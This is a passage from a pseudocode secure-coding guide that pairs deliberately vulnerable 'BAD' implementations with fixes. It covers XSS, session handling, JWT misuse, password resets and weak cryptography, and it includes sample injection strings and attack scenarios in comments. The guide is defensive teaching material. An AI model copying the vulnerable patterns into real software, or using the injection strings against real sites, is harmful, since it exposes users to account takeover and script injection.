" +END FUNCTION + +// HTML encoding function +FUNCTION html_encode(input): + result = input + result = result.replace("&", "&amp;") + result = result.replace("<", "&lt;") + result = result.replace(">", "&gt;") + result = result.replace('"', "&quot;") + result = result.replace("'", "&#x27;") + RETURN result +END FUNCTION +``` + +### 3.2 Stored XSS (Database to Page Without Encoding) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Stored data rendered without encoding +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Vulnerable: Stored data rendered directly + html += "
" + html += "" + comment.author + "" + html += "

" + comment.text + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Vulnerable: User-controlled fields rendered directly + html = "

" + user.display_name + "

" + html += "
" + user.biography + "
" + RETURN html +END FUNCTION + +// Attack: Attacker saves comment with text: +// Result: Every user viewing the page executes attacker's script + +// ======================================== +// GOOD: Encode all database-sourced content +// ======================================== +FUNCTION display_comments(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + html = "
" + FOR comment IN comments: + // Safe: All stored data is encoded + html += "
" + html += "" + html_encode(comment.author) + "" + html += "

" + html_encode(comment.text) + "

" + html += "
" + END FOR + html += "
" + RETURN html +END FUNCTION + +FUNCTION display_user_profile(user_id): + user = database.get_user(user_id) + + // Safe: Encode user-controlled fields + html = "

" + html_encode(user.display_name) + "

" + html += "
" + html_encode(user.biography) + "
" + RETURN html +END FUNCTION + +// Better: Use templating engine with auto-escaping +FUNCTION display_comments_template(post_id): + comments = database.query("SELECT * FROM comments WHERE post_id = ?", [post_id]) + + // Templating engines like Jinja2, Handlebars auto-escape by default + RETURN template.render("comments.html", {comments: comments}) +END FUNCTION +``` + +### 3.3 DOM-Based XSS (innerHTML, document.write) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Dangerous DOM manipulation methods +// ======================================== +FUNCTION display_welcome_message(): + // Vulnerable: URL parameter into innerHTML + params = parse_url_parameters(window.location.search) + username = params.get("name") + + document.getElementById("welcome").innerHTML = + "Welcome, " + username + "!" +END FUNCTION + +FUNCTION update_content(user_content): + // Vulnerable: User content via innerHTML + document.getElementById("content").innerHTML = user_content +END FUNCTION + +FUNCTION load_dynamic_script(url): + // Dangerous: document.write with external content + document.write("") +END FUNCTION + +// Attack: ?name= +// Result: XSS via event handler, bypasses simple " + html += "" + + // Attacker-injected scripts without nonce will be blocked + RETURN html +END FUNCTION + +// CSP report-only mode for testing +FUNCTION configure_csp_reporting(): + server.set_header("Content-Security-Policy-Report-Only", + "default-src 'self'; report-uri /csp-report" + ) +END FUNCTION +``` + +### 3.5 Improper Output Encoding (Context-Specific) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Wrong encoding for context +// ======================================== +FUNCTION render_javascript_variable(user_input): + // Vulnerable: HTML encoding doesn't protect JavaScript context + safe_for_html = html_encode(user_input) + + script = "" + RETURN script +END FUNCTION 
+ +FUNCTION render_url_parameter(user_input): + // Vulnerable: No URL encoding + url = "https://example.com/page?data=" + user_input + RETURN "
Link" +END FUNCTION + +FUNCTION render_css_value(user_color): + // Vulnerable: No CSS encoding + style = "
Text
" + RETURN style +END FUNCTION + +// Attack on JS context: User input = "'; alert(1); //'" +// Result: var userData = ''; alert(1); //''; - Script injection + +// ======================================== +// GOOD: Context-specific encoding +// ======================================== + +// JavaScript string context +FUNCTION js_encode(input): + result = input + result = result.replace("\\", "\\\\") + result = result.replace("'", "\\'") + result = result.replace('"', '\\"') + result = result.replace("\n", "\\n") + result = result.replace("\r", "\\r") + result = result.replace("<", "\\x3c") // Prevent breakout + result = result.replace(">", "\\x3e") + RETURN result +END FUNCTION + +FUNCTION render_javascript_variable(user_input): + // Safe: Proper JavaScript encoding + safe_for_js = js_encode(user_input) + + script = "" + RETURN script +END FUNCTION + +// Better: Use JSON encoding for complex data +FUNCTION render_javascript_data(user_data): + // Safest: JSON encoding handles all edge cases + json_data = json_encode(user_data) + + script = "" + RETURN script +END FUNCTION + +// URL context +FUNCTION render_url_parameter(user_input): + // Safe: URL encoding + encoded_param = url_encode(user_input) + url = "https://example.com/page?data=" + encoded_param + + // Also HTML-encode the entire URL for the href attribute + RETURN "Link" +END FUNCTION + +// CSS context +FUNCTION css_encode(input): + // Only allow safe CSS values + allowed_pattern = "^[a-zA-Z0-9#]+$" + IF NOT regex.match(allowed_pattern, input): + RETURN "inherit" // Safe default + END IF + RETURN input +END FUNCTION + +FUNCTION render_css_value(user_color): + // Safe: Validate and encode CSS value + safe_color = css_encode(user_color) + style = "
Text
" + RETURN style +END FUNCTION + +// HTML attribute context +FUNCTION render_attribute(attr_name, user_value): + // HTML-encode and quote attribute value + safe_value = html_encode(user_value) + RETURN attr_name + '="' + safe_value + '"' +END FUNCTION +``` + +--- + +## 4. Authentication and Session Management + +**CWE References:** CWE-287 (Improper Authentication), CWE-384 (Session Fixation), CWE-521 (Weak Password Requirements), CWE-307 (Improper Restriction of Excessive Authentication Attempts), CWE-613 (Insufficient Session Expiration) +**Severity:** Critical | **Related:** [[Authentication-Failures]] + +> **Risk:** Authentication failures are a leading cause of data breaches. AI-generated code often implements weak password policies, insecure session handling, and vulnerable JWT patterns learned from outdated tutorials. Proper authentication requires defense in depth: strong credentials, secure sessions, rate limiting, and multi-factor authentication. + +### 4.1 Weak Password Requirements + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No or weak password validation +// ======================================== +FUNCTION register_user(username, password): + // Vulnerable: No password strength requirements + IF password.length < 4: + THROW Error("Password too short") + END IF + + // No checks for complexity, common passwords, or breaches + hash = simple_hash(password) // Often MD5 or SHA1 + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_weak(password): + // Vulnerable: Only checks length + RETURN password.length >= 6 +END FUNCTION + +// Problems: +// - Allows "123456", "password", "qwerty" +// - No complexity requirements +// - No check against breached password lists + +// ======================================== +// GOOD: Strong password policy with multiple checks +// ======================================== +FUNCTION 
register_user(username, password): + validation_result = validate_password_strength(username, password) + + IF NOT validation_result.is_valid: + THROW Error(validation_result.message) + END IF + + // Use strong hashing algorithm with salt + hash = bcrypt.hash(password, rounds=12) + database.insert("users", {username: username, password_hash: hash}) +END FUNCTION + +FUNCTION validate_password_strength(username, password): + errors = [] + + // Minimum length (NIST recommends 8+, many use 12+) + IF password.length < 12: + errors.append("Password must be at least 12 characters") + END IF + + // Maximum length (prevent DoS via very long passwords) + IF password.length > 128: + errors.append("Password must not exceed 128 characters") + END IF + + // Check character diversity + has_upper = regex.search("[A-Z]", password) + has_lower = regex.search("[a-z]", password) + has_digit = regex.search("[0-9]", password) + has_special = regex.search("[!@#$%^&*(),.?\":{}|<>]", password) + + IF NOT (has_upper AND has_lower AND has_digit): + errors.append("Password must contain uppercase, lowercase, and numbers") + END IF + + // Check against common passwords list + IF is_common_password(password): + errors.append("Password is too common, choose a unique password") + END IF + + // Check against breached passwords (via k-Anonymity API) + IF is_breached_password(password): + errors.append("Password found in data breach, choose another") + END IF + + // Check for username in password + IF password.lower().contains(username.lower()): + errors.append("Password cannot contain username") + END IF + + RETURN { + is_valid: errors.length == 0, + message: errors.join("; ") + } +END FUNCTION + +// Check breached passwords using k-Anonymity (e.g., HaveIBeenPwned API) +FUNCTION is_breached_password(password): + hash = sha1(password).upper() + prefix = hash.substring(0, 5) + suffix = hash.substring(5) + + // Only send hash prefix to API (privacy-preserving) + response = http.get("https://api.pwnedpasswords.com/range/" 
+ prefix) + hashes = parse_pwned_response(response) + + RETURN suffix IN hashes +END FUNCTION +``` + +### 4.2 Missing Rate Limiting on Auth Endpoints + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No rate limiting on authentication +// ======================================== +FUNCTION login(username, password): + // Vulnerable: No limit on login attempts + user = database.find_user(username) + + IF user IS NULL: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + IF bcrypt.verify(password, user.password_hash): + RETURN {success: TRUE, token: generate_token(user)} + ELSE: + RETURN {success: FALSE, error: "Invalid credentials"} + END IF +END FUNCTION + +// Problems: +// - Allows unlimited password guessing (brute force) +// - Allows credential stuffing attacks +// - No account lockout protection + +// ======================================== +// GOOD: Rate limiting with progressive delays +// ======================================== +FUNCTION login(username, password): + client_ip = request.get_client_ip() + + // Check IP-based rate limit (slows a single source guessing across many accounts) + IF is_ip_rate_limited(client_ip): + log.warning("Rate limited IP attempted login", {ip: client_ip}) + RETURN {success: FALSE, error: "Too many attempts, try again later"} + END IF + + // Check account-based rate limit (protects a specific account, even when guesses come from many IPs) + IF is_account_rate_limited(username): + log.warning("Rate limited account attempted login", {username: username}) + RETURN {success: FALSE, error: "Account temporarily locked"} + END IF + + user = database.find_user(username) + + // Always run a hash verification, even for unknown users, so response time + // does not reveal whether the account exists. + // DUMMY_PASSWORD_HASH is a hypothetical constant: a precomputed bcrypt hash of a random value + hash_to_check = DUMMY_PASSWORD_HASH + IF user IS NOT NULL: + hash_to_check = user.password_hash + END IF + password_ok = bcrypt.verify(password, hash_to_check) + + IF user IS NULL OR NOT password_ok: + record_failed_attempt(username, client_ip) + // Generic error message (don't reveal if user exists) + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Successful login - reset counters + 
clear_failed_attempts(username, client_ip) + + RETURN {success: TRUE, token: generate_token(user)} +END FUNCTION + +// IP-based rate limiting +FUNCTION is_ip_rate_limited(ip): + key = "login_attempts:ip:" + ip + attempts = rate_limiter.get(key, default=0) + + // Allow 10 attempts per 15 minutes per IP + RETURN attempts >= 10 +END FUNCTION + +// Account-based rate limiting with progressive lockout +FUNCTION is_account_rate_limited(username): + key = "login_attempts:user:" + username + attempts = rate_limiter.get(key, default=0) + + // Progressive lockout: + // 5 attempts: 1 minute lockout + // 10 attempts: 5 minute lockout + // 15 attempts: 15 minute lockout + // 20+ attempts: 1 hour lockout + + IF attempts >= 20: + lockout_time = 3600 // 1 hour + ELSE IF attempts >= 15: + lockout_time = 900 // 15 minutes + ELSE IF attempts >= 10: + lockout_time = 300 // 5 minutes + ELSE IF attempts >= 5: + lockout_time = 60 // 1 minute + ELSE: + RETURN FALSE + END IF + + last_attempt = rate_limiter.get_timestamp(key) + RETURN (current_time() - last_attempt) < lockout_time +END FUNCTION + +FUNCTION record_failed_attempt(username, ip): + // Increment both counters with TTL + rate_limiter.increment("login_attempts:ip:" + ip, ttl=900) + rate_limiter.increment("login_attempts:user:" + username, ttl=3600) + + // Alert on suspicious patterns + ip_attempts = rate_limiter.get("login_attempts:ip:" + ip) + IF ip_attempts >= 50: + security_alert("Possible brute force attack from IP: " + ip) + END IF +END FUNCTION +``` + +### 4.3 Insecure Session Token Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable session tokens +// ======================================== +FUNCTION create_session_weak(user_id): + // Vulnerable: Predictable token based on user ID + token = "session_" + user_id + "_" + current_timestamp() + RETURN token +END FUNCTION + +FUNCTION create_session_sequential(): + // Vulnerable: 
Sequential/incremental tokens + GLOBAL session_counter + session_counter = session_counter + 1 + RETURN "session_" + session_counter +END FUNCTION + +FUNCTION create_session_weak_random(): + // Vulnerable: Using Math.random() or similar weak PRNG + token = "" + FOR i = 1 TO 32: + token = token + random_char() // Math.random() based + END FOR + RETURN token +END FUNCTION + +// Attack: Attacker can predict/enumerate session tokens +// - Timestamp-based: Try tokens from recent timestamps +// - Sequential: Try nearby session IDs +// - Weak random: Seed prediction or insufficient entropy + +// ======================================== +// GOOD: Cryptographically secure session tokens +// ======================================== +FUNCTION create_session(user_id): + // Generate cryptographically secure random token + // Use 256 bits (32 bytes) minimum for security + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) // URL-safe encoding + + // Store session with metadata + session_data = { + user_id: user_id, + created_at: current_timestamp(), + expires_at: current_timestamp() + SESSION_LIFETIME, + ip_address: request.get_client_ip(), + user_agent: request.get_user_agent() + } + + // Store hashed token (protect against database leaks) + token_hash = sha256(token) + session_store.set(token_hash, session_data) + + RETURN token +END FUNCTION + +FUNCTION validate_session(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + session = session_store.get(token_hash) + + IF session IS NULL: + RETURN NULL + END IF + + // Check expiration + IF current_timestamp() > session.expires_at: + session_store.delete(token_hash) + RETURN NULL + END IF + + // Optional: Validate IP/User-Agent consistency + IF session.ip_address != request.get_client_ip(): + log.warning("Session IP mismatch", { + expected: session.ip_address, + actual: request.get_client_ip() + }) + // Decide whether to invalidate or just log + 
END IF + + RETURN session +END FUNCTION + +// Secure cookie configuration +FUNCTION set_session_cookie(response, token): + response.set_cookie("session", token, { + httponly: TRUE, // Prevent JavaScript access + secure: TRUE, // HTTPS only + samesite: "Strict", // Prevent CSRF + max_age: SESSION_LIFETIME, + path: "/" + }) +END FUNCTION +``` + +### 4.4 Session Fixation Vulnerabilities + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Session ID not regenerated on login +// ======================================== +FUNCTION login_vulnerable(username, password): + // Session ID was set when user first visited (before login) + session_id = request.get_cookie("session_id") + + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // Vulnerable: Reusing pre-authentication session ID + session_store.set(session_id, {user_id: user.id, authenticated: TRUE}) + RETURN {success: TRUE} +END FUNCTION + +// Attack scenario: +// 1. Attacker visits site, gets session_id=ABC123 +// 2. Attacker sends victim link: https://site.com?session_id=ABC123 +// 3. Victim logs in with attacker's session ID +// 4. 
Attacker uses session_id=ABC123 to access victim's account + +// ======================================== +// GOOD: Regenerate session on authentication changes +// ======================================== +FUNCTION login_secure(username, password): + user = authenticate(username, password) + IF user IS NULL: + RETURN {success: FALSE} + END IF + + // CRITICAL: Invalidate old session and create new one + old_session_id = request.get_cookie("session_id") + IF old_session_id IS NOT NULL: + session_store.delete(old_session_id) + END IF + + // Generate completely new session ID + new_session = create_session(user.id) + + // Set new session cookie + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN {success: TRUE} +END FUNCTION + +// Also regenerate session on privilege escalation +FUNCTION elevate_privileges(user, new_role): + // Invalidate current session + old_session_id = request.get_cookie("session_id") + session_store.delete(old_session_id) + + // Create new session with elevated privileges + new_session = create_session(user.id) + new_session.role = new_role + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session +END FUNCTION + +// Regenerate session periodically for long-lived sessions +FUNCTION check_session_rotation(session): + // Rotate session every 15 minutes for active users + IF current_timestamp() - session.created_at > 900: + new_session = create_session(session.user_id) + new_session.data = session.data // Preserve session data + + session_store.delete(session.id) + + response.set_cookie("session_id", new_session.token, { + httponly: TRUE, + secure: TRUE, + samesite: "Strict" + }) + + RETURN new_session + END IF + + RETURN session +END FUNCTION +``` + +### 4.5 JWT Misuse (None Algorithm, Weak Secrets, Sensitive Data) + +``` +// PSEUDOCODE - Implement in your target language + +// 
======================================== +// BAD: Common JWT security mistakes +// ======================================== + +// Mistake 1: Not verifying algorithm (none algorithm attack) +FUNCTION verify_jwt_vulnerable(token): + // Vulnerable: Accepts whatever algorithm is in the header + decoded = jwt.decode(token, SECRET_KEY) // Attacker sets alg: "none" + RETURN decoded +END FUNCTION + +// Mistake 2: Weak or short secret key +CONSTANT JWT_SECRET = "secret123" // Easily brute-forced + +FUNCTION create_jwt_weak(user_id): + payload = {user_id: user_id, exp: current_time() + 86400} + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +// Mistake 3: Sensitive data in payload (JWTs are base64, not encrypted!) +FUNCTION create_jwt_exposed(user): + payload = { + user_id: user.id, + email: user.email, + ssn: user.social_security_number, // PII in token! + credit_card: user.card_number, // Sensitive data exposed! + password_hash: user.password_hash, // Never put this in JWT! + exp: current_time() + 86400 + } + RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// Mistake 4: No expiration or very long expiration +FUNCTION create_jwt_no_expiry(user_id): + payload = {user_id: user_id} // No exp claim! 
+ RETURN jwt.encode(payload, SECRET_KEY) +END FUNCTION + +// ======================================== +// GOOD: Secure JWT implementation +// ======================================== + +// Use a strong secret (256+ bits for HS256) +CONSTANT JWT_SECRET = environment.get("JWT_SECRET") // From secret manager + +FUNCTION initialize_jwt(): + // Validate secret strength at startup + IF JWT_SECRET IS NULL OR JWT_SECRET.length < 32: + THROW Error("JWT_SECRET must be at least 256 bits") + END IF +END FUNCTION + +FUNCTION create_jwt_secure(user_id, expiry=3600): + now = current_time() + user = database.get_user(user_id) // Needed for the role claim below + + payload = { + // Standard claims + sub: user_id, // Subject + iat: now, // Issued at + exp: now + expiry, // Expiration (default 1 hour; keep access tokens short-lived) + nbf: now, // Not before + + // Custom claims (non-sensitive only!) + role: user.role // Roles are OK + // Never include: passwords, PII, payment info + } + + // Explicitly specify algorithm + RETURN jwt.encode(payload, JWT_SECRET, algorithm="HS256") +END FUNCTION + +FUNCTION verify_jwt_secure(token): + TRY: + // CRITICAL: Explicitly specify allowed algorithms + decoded = jwt.decode(token, JWT_SECRET, algorithms=["HS256"]) + + // Additional validation (defense in depth; most libraries already check exp/nbf) + IF decoded.exp < current_time(): + THROW Error("Token expired") + END IF + + IF decoded.nbf > current_time(): + THROW Error("Token not yet valid") + END IF + + RETURN decoded + + CATCH JWTError as e: + log.warning("JWT verification failed", {error: e.message}) + RETURN NULL + END TRY +END FUNCTION + +// For sensitive applications, use asymmetric keys (RS256) +FUNCTION create_jwt_asymmetric(user_id): + private_key = load_private_key("jwt_private.pem") + + payload = { + sub: user_id, + iat: current_time(), + exp: current_time() + 3600 + } + + // Sign with private key + RETURN jwt.encode(payload, private_key, algorithm="RS256") +END FUNCTION + +FUNCTION verify_jwt_asymmetric(token): + public_key = load_public_key("jwt_public.pem") + + // Verify with public key (can be shared safely) + RETURN jwt.decode(token,
public_key, algorithms=["RS256"]) +END FUNCTION + +// Implement refresh token pattern for long-lived sessions +FUNCTION create_token_pair(user_id): + // Short-lived access token (15 minutes) + access_token = create_jwt_secure(user_id, expiry=900) + + // Long-lived refresh token (7 days) - store in DB for revocation + refresh_token = crypto.secure_random_bytes(32).to_base64() + database.insert("refresh_tokens", { + token_hash: sha256(refresh_token), + user_id: user_id, + expires_at: current_time() + 604800 + }) + + RETURN { + access_token: access_token, + refresh_token: refresh_token + } +END FUNCTION +``` + +### 4.6 Missing MFA Considerations + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Single-factor authentication only +// ======================================== +FUNCTION login_single_factor(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Immediately grant full access after password verification + token = create_session(user.id) + RETURN {success: TRUE, token: token} +END FUNCTION + +// Problems: +// - Compromised password = full account takeover +// - No protection against credential stuffing +// - Phishing attacks succeed completely +// - No step-up authentication for sensitive operations + +// ======================================== +// GOOD: MFA-aware authentication flow +// ======================================== +FUNCTION login_with_mfa(username, password): + user = database.find_user(username) + + IF user IS NULL OR NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid credentials"} + END IF + + // Check if MFA is enabled + IF user.mfa_enabled: + // Create partial session (not fully authenticated) + partial_token = create_partial_session(user.id) + + RETURN { + success: FALSE, + mfa_required: TRUE, 
+ partial_token: partial_token, + mfa_methods: get_user_mfa_methods(user.id) + } + END IF + + // If MFA not enabled, encourage setup + token = create_session(user.id) + RETURN { + success: TRUE, + token: token, + mfa_suggestion: user.is_admin // Strongly suggest MFA for admins + } +END FUNCTION + +FUNCTION verify_mfa(partial_token, mfa_code, mfa_method): + session = get_partial_session(partial_token) + + IF session IS NULL OR session.expires_at < current_time(): + RETURN {success: FALSE, error: "Session expired, please login again"} + END IF + + user = database.get_user(session.user_id) + + // Verify MFA code based on method + is_valid = FALSE + + IF mfa_method == "totp": + is_valid = verify_totp(user.totp_secret, mfa_code) + ELSE IF mfa_method == "sms": + is_valid = verify_sms_code(user.id, mfa_code) + ELSE IF mfa_method == "backup": + is_valid = verify_backup_code(user.id, mfa_code) + END IF + + IF NOT is_valid: + record_failed_mfa_attempt(user.id) + RETURN {success: FALSE, error: "Invalid verification code"} + END IF + + // MFA verified - create full session + delete_partial_session(partial_token) + token = create_session(user.id) + + RETURN {success: TRUE, token: token} +END FUNCTION + +// TOTP verification with time window +FUNCTION verify_totp(secret, code): + // Allow 1 step before and after for clock drift (30 second windows) + FOR step IN [-1, 0, 1]: + expected = generate_totp(secret, time_step=step) + IF constant_time_compare(code, expected): + RETURN TRUE + END IF + END FOR + RETURN FALSE +END FUNCTION + +// Step-up authentication for sensitive operations +FUNCTION require_recent_auth(user_session, max_age_seconds): + IF current_time() - user_session.authenticated_at > max_age_seconds: + RETURN { + requires_reauth: TRUE, + message: "Please re-enter your password for this action" + } + END IF + RETURN {requires_reauth: FALSE} +END FUNCTION + +FUNCTION perform_sensitive_action(session, action, password): + // Require recent password entry for sensitive 
actions + user = database.get_user(session.user_id) + + IF NOT bcrypt.verify(password, user.password_hash): + RETURN {success: FALSE, error: "Invalid password"} + END IF + + // Update authentication timestamp + session.authenticated_at = current_time() + + // Perform the sensitive action + RETURN execute_action(action) +END FUNCTION +``` + +### 4.7 Insecure Password Reset Flows + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Insecure password reset implementations +// ======================================== + +// Mistake 1: Predictable reset tokens +FUNCTION create_reset_token_weak(user_id): + // Vulnerable: MD5 of user_id + timestamp is guessable + token = md5(user_id + current_timestamp()) + database.save_reset_token(user_id, token) + RETURN token +END FUNCTION + +// Mistake 2: Token never expires +FUNCTION request_password_reset_no_expiry(email): + user = database.find_user_by_email(email) + token = generate_token() + // Vulnerable: No expiration set + database.save_reset_token(user.id, token) + send_email(email, "Reset: " + BASE_URL + "/reset?token=" + token) +END FUNCTION + +// Mistake 3: Token not invalidated after use +FUNCTION reset_password_reusable(token, new_password): + user_id = database.get_user_by_reset_token(token) + user = database.get_user(user_id) + user.password_hash = hash(new_password) + database.save(user) + // Vulnerable: Token still valid, can be reused! +END FUNCTION + +// Mistake 4: User enumeration via different responses +FUNCTION request_reset_enumeration(email): + user = database.find_user_by_email(email) + IF user IS NULL: + RETURN {error: "No account found with this email"} // Reveals info! + END IF + // ... 
send reset email + RETURN {success: TRUE, message: "Reset email sent"} +END FUNCTION + +// Mistake 5: Sending password in email +FUNCTION reset_password_insecure(email): + user = database.find_user_by_email(email) + new_password = generate_random_password() + user.password_hash = hash(new_password) + // Vulnerable: Password in plaintext email + send_email(email, "Your new password is: " + new_password) +END FUNCTION + +// ======================================== +// GOOD: Secure password reset flow +// ======================================== +FUNCTION request_password_reset(email): + // Always return same response to prevent enumeration + user = database.find_user_by_email(email) + + IF user IS NOT NULL: + // Invalidate any existing reset tokens + database.delete_reset_tokens(user.id) + + // Generate cryptographically secure token + token_bytes = crypto.secure_random_bytes(32) + token = base64_url_encode(token_bytes) + + // Store hashed token with expiration + token_hash = sha256(token) + database.save_reset_token({ + user_id: user.id, + token_hash: token_hash, + expires_at: current_time() + 3600, // 1 hour expiration + created_at: current_time() + }) + + // Send reset email + reset_url = BASE_URL + "/reset-password?token=" + token + send_email(user.email, "password_reset", {reset_url: reset_url}) + + log.info("Password reset requested", {user_id: user.id}) + END IF + + // Same response whether user exists or not + RETURN { + success: TRUE, + message: "If an account exists, a reset email has been sent" + } +END FUNCTION + +FUNCTION validate_reset_token(token): + IF token IS NULL OR token.length < 32: + RETURN NULL + END IF + + token_hash = sha256(token) + reset_record = database.find_reset_token(token_hash) + + IF reset_record IS NULL: + log.warning("Invalid reset token attempted") + RETURN NULL + END IF + + // Check expiration + IF current_time() > reset_record.expires_at: + database.delete_reset_token(token_hash) + RETURN NULL + END IF + + RETURN reset_record 
+END FUNCTION + +FUNCTION reset_password(token, new_password): + reset_record = validate_reset_token(token) + + IF reset_record IS NULL: + RETURN {success: FALSE, error: "Invalid or expired reset link"} + END IF + + // Validate new password strength + validation = validate_password_strength(new_password) + IF NOT validation.is_valid: + RETURN {success: FALSE, error: validation.message} + END IF + + user = database.get_user(reset_record.user_id) + + // Check if new password is same as old + IF bcrypt.verify(new_password, user.password_hash): + RETURN {success: FALSE, error: "New password must be different"} + END IF + + // Update password + user.password_hash = bcrypt.hash(new_password, rounds=12) + database.save(user) + + // CRITICAL: Invalidate the reset token + database.delete_reset_token(sha256(token)) + + // Invalidate all existing sessions (force re-login) + session_store.delete_all_user_sessions(user.id) + + // Send confirmation email + send_email(user.email, "password_changed", { + timestamp: current_time(), + ip_address: request.get_client_ip() + }) + + log.info("Password reset completed", {user_id: user.id}) + + RETURN {success: TRUE, message: "Password reset successfully"} +END FUNCTION + +// Additional security: Limit reset requests +FUNCTION rate_limit_reset_requests(email): + key = "password_reset:" + sha256(email) + attempts = rate_limiter.get(key, default=0) + + IF attempts >= 3: + // Max 3 reset requests per hour + RETURN FALSE + END IF + + rate_limiter.increment(key, ttl=3600) + RETURN TRUE +END FUNCTION +``` + +--- + +## 5. 
Cryptographic Failures + +**CWE References:** CWE-327 (Use of Broken or Risky Cryptographic Algorithm), CWE-328 (Use of Weak Hash), CWE-330 (Use of Insufficiently Random Values), CWE-326 (Inadequate Encryption Strength), CWE-759 (Use of One-Way Hash without a Salt) +**Severity:** High to Critical | **Related:** [[Cryptographic-Misuse]] + +> **Risk:** AI models frequently suggest outdated or weak cryptographic algorithms (MD5, SHA-1, DES) learned from decades of legacy code in training data. Cryptographic failures lead to data exposure, password compromise, and authentication bypass. A 14% failure rate for CWE-327 was documented in AI-generated code, with a "significant increase" in encryption vulnerabilities when using AI assistants. + +### 5.1 Using Deprecated Algorithms (MD5, SHA1 for Security, DES) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Deprecated hash algorithms for security +// ======================================== +FUNCTION hash_password_weak(password): + // Vulnerable: MD5 is cryptographically broken + RETURN md5(password) +END FUNCTION + +FUNCTION verify_integrity_weak(data): + // Vulnerable: SHA-1 has known collision attacks + RETURN sha1(data) +END FUNCTION + +FUNCTION encrypt_data_weak(plaintext, key): + // Vulnerable: DES uses 56-bit keys (trivially breakable) + cipher = DES.new(key, mode=ECB) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - MD5: Collisions found in seconds, rainbow tables widely available +// - SHA-1: Collision attacks demonstrated (SHAttered, 2017) +// - DES: Brute-forceable in hours with modern hardware + +// ======================================== +// GOOD: Modern cryptographic algorithms +// ======================================== +FUNCTION hash_password_secure(password): + // Use bcrypt, Argon2, or scrypt for passwords + salt = bcrypt.generate_salt(rounds=12) + RETURN bcrypt.hash(password, salt) +END FUNCTION + +FUNCTION
verify_integrity_secure(data): + // Use SHA-256, SHA-3, or BLAKE2 for integrity + RETURN sha256(data) +END FUNCTION + +FUNCTION encrypt_data_secure(plaintext, key): + // Use AES-256-GCM or ChaCha20-Poly1305 + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + RETURN nonce + tag + ciphertext // Include nonce and auth tag +END FUNCTION + +// Algorithm selection guide: +// - Password hashing: bcrypt, Argon2id, scrypt (NOT SHA-256 alone) +// - Symmetric encryption: AES-256-GCM, ChaCha20-Poly1305 +// - Integrity/checksums: SHA-256, SHA-3, BLAKE2 +// - Signatures: Ed25519, ECDSA with P-256, RSA-2048+ +``` + +### 5.2 Hardcoded Encryption Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded encryption keys in source +// ======================================== +CONSTANT ENCRYPTION_KEY = "MySecretKey12345" // Committed to repo! +CONSTANT AES_KEY = bytes([0x2b, 0x7e, 0x15, 0x16, ...]) // Still hardcoded + +FUNCTION encrypt_user_data(data): + cipher = AES.new(ENCRYPTION_KEY, mode=GCM) + RETURN cipher.encrypt(data) +END FUNCTION + +// Problems: +// - Keys in version control are exposed forever +// - Cannot rotate keys without code changes +// - All environments share same key + +// ======================================== +// GOOD: External key management +// ======================================== +FUNCTION get_encryption_key(): + // Option 1: Environment variable + key = environment.get("ENCRYPTION_KEY") + + IF key IS NULL: + THROW Error("ENCRYPTION_KEY environment variable required") + END IF + + // Validate key length for AES-256 + key_bytes = base64_decode(key) + IF key_bytes.length != 32: + THROW Error("ENCRYPTION_KEY must be 256 bits") + END IF + + RETURN key_bytes +END FUNCTION + +FUNCTION encrypt_user_data(data): + key = get_encryption_key() + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, 
nonce) + ciphertext, tag = cipher.encrypt_and_digest(data) + RETURN nonce + tag + ciphertext +END FUNCTION + +// Better: Use a secret manager for production +FUNCTION get_encryption_key_from_manager(): + TRY: + // AWS Secrets Manager, HashiCorp Vault, Azure Key Vault, etc. + secret = secret_manager.get_secret("encryption-key") + RETURN base64_decode(secret.value) + CATCH Error as e: + log.error("Failed to retrieve encryption key", {error: e.message}) + THROW Error("Encryption key unavailable") + END TRY +END FUNCTION +``` + +### 5.3 ECB Mode Usage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: ECB mode reveals patterns in data +// ======================================== +FUNCTION encrypt_ecb(plaintext, key): + // Vulnerable: ECB encrypts identical blocks identically + cipher = AES.new(key, mode=ECB) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +// Problem demonstration: +// Encrypting an image with ECB mode preserves visual patterns +// because identical 16-byte blocks produce identical ciphertext +// This reveals structure of the original data! + +// Identical plaintexts produce identical ciphertexts: 